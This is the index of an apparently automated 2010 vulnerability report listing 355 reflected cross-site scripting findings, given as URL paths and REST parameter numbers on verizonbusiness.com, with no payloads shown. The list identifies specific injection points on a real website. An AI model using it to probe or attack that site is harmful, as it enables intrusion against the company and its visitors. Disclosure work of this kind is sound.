Hoyt LLC | Cross Site Scripting Report of 11-16-2010

Web Property: http://www.verizonbusiness.com

Report generated by Hoyt LLC at Tue Nov 16 19:08:13 CST 2010.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.


1. Cross-site scripting (reflected)

1.1. http://www.verizonbusiness.com/Medium/ [REST URL parameter 1]

1.2. http://www.verizonbusiness.com/Medium/ [REST URL parameter 1]

1.3. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 1]

1.4. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 1]

1.5. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 2]

1.6. http://www.verizonbusiness.com/Medium/products/ [REST URL parameter 2]

1.7. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 1]

1.8. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 1]

1.9. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 2]

1.10. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 2]

1.11. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 3]

1.12. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 3]

1.13. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 4]

1.14. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 4]

1.15. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 5]

1.16. http://www.verizonbusiness.com/Medium/products/itinfrastructure/computing/caas_smb/ [REST URL parameter 5]

1.17. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 1]

1.18. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 1]

1.19. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 2]

1.20. http://www.verizonbusiness.com/Medium/solutions/ [REST URL parameter 2]

1.21. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 1]

1.22. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 1]

1.23. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 2]

1.24. http://www.verizonbusiness.com/Medium/support/ [REST URL parameter 2]

1.25. http://www.verizonbusiness.com/Products/ [REST URL parameter 1]

1.26. http://www.verizonbusiness.com/Products/ [REST URL parameter 1]

1.27. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 1]

1.28. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 1]

1.29. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 2]

1.30. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 2]

1.31. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 1]

1.32. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 1]

1.33. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 2]

1.34. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 2]

1.35. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 3]

1.36. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 3]

1.37. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 1]

1.38. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 1]

1.39. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 2]

1.40. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 2]

1.41. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 3]

1.42. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 3]

1.43. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 1]

1.44. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 1]

1.45. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 2]

1.46. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 2]

1.47. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 3]

1.48. http://www.verizonbusiness.com/Products/communications/emergency/ [REST URL parameter 3]

1.49. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 1]

1.50. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 1]

1.51. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 2]

1.52. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 2]

1.53. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 3]

1.54. http://www.verizonbusiness.com/Products/communications/ip-telephony/ [REST URL parameter 3]

1.55. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 1]

1.56. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 1]

1.57. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 2]

1.58. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 2]

1.59. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 3]

1.60. http://www.verizonbusiness.com/Products/communications/managed-ucc/ [REST URL parameter 3]

1.61. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 1]

1.62. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 1]

1.63. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 2]

1.64. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 2]

1.65. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 3]

1.66. http://www.verizonbusiness.com/Products/communications/prof-svcs/ [REST URL parameter 3]

1.67. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 1]

1.68. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 1]

1.69. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 2]

1.70. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 2]

1.71. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 3]

1.72. http://www.verizonbusiness.com/Products/communications/traditional-telephony/ [REST URL parameter 3]

1.73. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 1]

1.74. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 1]

1.75. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 2]

1.76. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 2]

1.77. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 3]

1.78. http://www.verizonbusiness.com/Products/communications/ucc/ [REST URL parameter 3]

1.79. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 1]

1.80. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 1]

1.81. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 2]

1.82. http://www.verizonbusiness.com/Products/it/ [REST URL parameter 2]

1.83. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 1]

1.84. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 1]

1.85. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 2]

1.86. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 2]

1.87. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 3]

1.88. http://www.verizonbusiness.com/Products/it/cloud-it/ [REST URL parameter 3]

1.89. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 1]

1.90. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 1]

1.91. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 2]

1.92. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 2]

1.93. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 3]

1.94. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 3]

1.95. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 4]

1.96. http://www.verizonbusiness.com/Products/it/cloud-it/caas/ [REST URL parameter 4]

1.97. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 1]

1.98. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 1]

1.99. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 2]

1.100. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 2]

1.101. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 3]

1.102. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 3]

1.103. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 4]

1.104. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 4]

1.105. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 5]

1.106. http://www.verizonbusiness.com/Products/it/cloud-it/caas/security.xml [REST URL parameter 5]

1.107. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 1]

1.108. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 1]

1.109. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 2]

1.110. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 2]

1.111. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 3]

1.112. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 3]

1.113. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 4]

1.114. http://www.verizonbusiness.com/Products/it/cloud-it/cloud-storage/ [REST URL parameter 4]

1.115. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 1]

1.116. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 1]

1.117. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 2]

1.118. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 2]

1.119. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 3]

1.120. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 3]

1.121. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 1]

1.122. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 1]

1.123. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 2]

1.124. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 2]

1.125. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 3]

1.126. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 3]

1.127. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 1]

1.128. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 1]

1.129. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 2]

1.130. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 2]

1.131. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 3]

1.132. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 3]

1.133. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 4]

1.134. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 4]

1.135. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 1]

1.136. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 1]

1.137. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 2]

1.138. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 2]

1.139. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 3]

1.140. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 3]

1.141. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 4]

1.142. http://www.verizonbusiness.com/Products/it/managed-apps/enterprise/ [REST URL parameter 4]

1.143. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 1]

1.144. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 1]

1.145. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 2]

1.146. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 2]

1.147. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 3]

1.148. http://www.verizonbusiness.com/Products/it/managed-it/ [REST URL parameter 3]

1.149. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 1]

1.150. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 1]

1.151. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 2]

1.152. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 2]

1.153. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 3]

1.154. http://www.verizonbusiness.com/Products/it/prof-svcs/ [REST URL parameter 3]

1.155. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 1]

1.156. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 1]

1.157. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 2]

1.158. http://www.verizonbusiness.com/Products/mobility/ [REST URL parameter 2]

1.159. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 1]

1.160. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 1]

1.161. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 2]

1.162. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 2]

1.163. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 3]

1.164. http://www.verizonbusiness.com/Products/mobility/applications/ [REST URL parameter 3]

1.165. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 1]

1.166. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 1]

1.167. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 2]

1.168. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 2]

1.169. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 3]

1.170. http://www.verizonbusiness.com/Products/mobility/fixed-wireless/ [REST URL parameter 3]

1.171. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 1]

1.172. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 1]

1.173. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 2]

1.174. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 2]

1.175. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 3]

1.176. http://www.verizonbusiness.com/Products/mobility/global-communications/ [REST URL parameter 3]

1.177. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 1]

1.178. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 1]

1.179. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 2]

1.180. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 2]

1.181. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 3]

1.182. http://www.verizonbusiness.com/Products/mobility/management/ [REST URL parameter 3]

1.183. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 1]

1.184. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 1]

1.185. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 2]

1.186. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 2]

1.187. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 3]

1.188. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 3]

1.189. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 4]

1.190. http://www.verizonbusiness.com/Products/mobility/management/managed/ [REST URL parameter 4]

1.191. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 1]

1.192. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 1]

1.193. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 2]

1.194. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 2]

1.195. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 3]

1.196. http://www.verizonbusiness.com/Products/mobility/mobile-email/ [REST URL parameter 3]

1.197. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 1]

1.198. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 1]

1.199. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 2]

1.200. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 2]

1.201. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 3]

1.202. http://www.verizonbusiness.com/Products/mobility/mobile-internet/ [REST URL parameter 3]

1.203. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 1]

1.204. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 1]

1.205. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 2]

1.206. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 2]

1.207. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 3]

1.208. http://www.verizonbusiness.com/Products/mobility/program-management/ [REST URL parameter 3]

1.209. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 1]

1.210. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 1]

1.211. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 2]

1.212. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 2]

1.213. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 3]

1.214. http://www.verizonbusiness.com/Products/mobility/voice-messaging/ [REST URL parameter 3]

1.215. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 1]

1.216. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 1]

1.217. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 2]

1.218. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 2]

1.219. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 3]

1.220. http://www.verizonbusiness.com/Products/mobility/wireless-devices/ [REST URL parameter 3]

1.221. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 1]

1.222. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 1]

1.223. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 2]

1.224. http://www.verizonbusiness.com/Products/networking/ [REST URL parameter 2]

1.225. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 1]

1.226. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 1]

1.227. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 2]

1.228. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 2]

1.229. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 3]

1.230. http://www.verizonbusiness.com/Products/networking/access/ [REST URL parameter 3]

1.231. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 1]

1.232. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 1]

1.233. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 2]

1.234. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 2]

1.235. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 3]

1.236. http://www.verizonbusiness.com/Products/networking/internet/ [REST URL parameter 3]

1.237. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 1]

1.238. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 1]

1.239. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 2]

1.240. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 2]

1.241. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 3]

1.242. http://www.verizonbusiness.com/Products/networking/managed [REST URL parameter 3]

1.243. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 1]

1.244. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 1]

1.245. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 2]

1.246. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 2]

1.247. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 3]

1.248. http://www.verizonbusiness.com/Products/networking/managed/ [REST URL parameter 3]

1.249. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 1]

1.250. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 1]

1.251. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 2]

1.252. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 2]

1.253. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 3]

1.254. http://www.verizonbusiness.com/Products/networking/point-to-point/ [REST URL parameter 3]

1.255. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 1]

1.256. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 1]

1.257. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 2]

1.258. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 2]

1.259. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 3]

1.260. http://www.verizonbusiness.com/Products/networking/private/ [REST URL parameter 3]

1.261. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 1]

1.262. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 1]

1.263. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 2]

1.264. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 2]

1.265. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 3]

1.266. http://www.verizonbusiness.com/Products/networking/prof-svcs/ [REST URL parameter 3]

1.267. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 1]

1.268. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 1]

1.269. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 2]

1.270. http://www.verizonbusiness.com/Products/security/ [REST URL parameter 2]

1.271. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 1]

1.272. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 1]

1.273. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 2]

1.274. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 2]

1.275. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 3]

1.276. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 3]

1.277. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 1]

1.278. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 1]

1.279. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 2]

1.280. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 2]

1.281. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 3]

1.282. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 3]

1.283. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 1]

1.284. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 1]

1.285. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 2]

1.286. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 2]

1.287. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 3]

1.288. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 3]

1.289. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 1]

1.290. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 1]

1.291. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 2]

1.292. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 2]

1.293. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 3]

1.294. http://www.verizonbusiness.com/Products/security/identity/ [REST URL parameter 3]

1.295. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 1]

1.296. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 1]

1.297. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 2]

1.298. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 2]

1.299. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 3]

1.300. http://www.verizonbusiness.com/Products/security/managed/ [REST URL parameter 3]

1.301. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 1]

1.302. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 1]

1.303. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 2]

1.304. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 2]

1.305. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 3]

1.306. http://www.verizonbusiness.com/Products/security/network-based/ [REST URL parameter 3]

1.307. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 1]

1.308. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 1]

1.309. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 2]

1.310. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 2]

1.311. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 3]

1.312. http://www.verizonbusiness.com/Products/security/prof-svcs/ [REST URL parameter 3]

1.313. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 1]

1.314. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 1]

1.315. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 2]

1.316. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 2]

1.317. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 3]

1.318. http://www.verizonbusiness.com/Products/security/risk/ [REST URL parameter 3]

1.319. http://www.verizonbusiness.com/about/ [REST URL parameter 1]

1.320. http://www.verizonbusiness.com/about/ [REST URL parameter 1]

1.321. http://www.verizonbusiness.com/about/company/ [REST URL parameter 1]

1.322. http://www.verizonbusiness.com/about/company/ [REST URL parameter 1]

1.323. http://www.verizonbusiness.com/about/company/ [REST URL parameter 2]

1.324. http://www.verizonbusiness.com/about/company/ [REST URL parameter 2]

1.325. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 1]

1.326. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 1]

1.327. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 2]

1.328. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 2]

1.329. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 3]

1.330. http://www.verizonbusiness.com/about/company/executives/ [REST URL parameter 3]

1.331. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 1]

1.332. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 1]

1.333. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 2]

1.334. http://www.verizonbusiness.com/about/environment/ [REST URL parameter 2]

1.335. http://www.verizonbusiness.com/about/events/ [REST URL parameter 1]

1.336. http://www.verizonbusiness.com/about/events/ [REST URL parameter 1]

1.337. http://www.verizonbusiness.com/about/events/ [REST URL parameter 2]

1.338. http://www.verizonbusiness.com/about/events/ [REST URL parameter 2]

1.339. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 1]

1.340. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 1]

1.341. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 2]

1.342. http://www.verizonbusiness.com/about/ipinnovation/ [REST URL parameter 2]

1.343. http://www.verizonbusiness.com/about/network/ [REST URL parameter 1]

1.344. http://www.verizonbusiness.com/about/network/ [REST URL parameter 1]

1.345. http://www.verizonbusiness.com/about/network/ [REST URL parameter 2]

1.346. http://www.verizonbusiness.com/about/network/ [REST URL parameter 2]

1.347. http://www.verizonbusiness.com/about/news/ [REST URL parameter 1]

1.348. http://www.verizonbusiness.com/about/news/ [REST URL parameter 1]

1.349. http://www.verizonbusiness.com/about/news/ [REST URL parameter 2]

1.350. http://www.verizonbusiness.com/about/news/ [REST URL parameter 2]

1.351. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 1]

1.352. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 1]

1.353. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 2]

1.354. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 2]

1.355. http://www.verizonbusiness.com/about/news/fast/ [REST URL parameter 3]

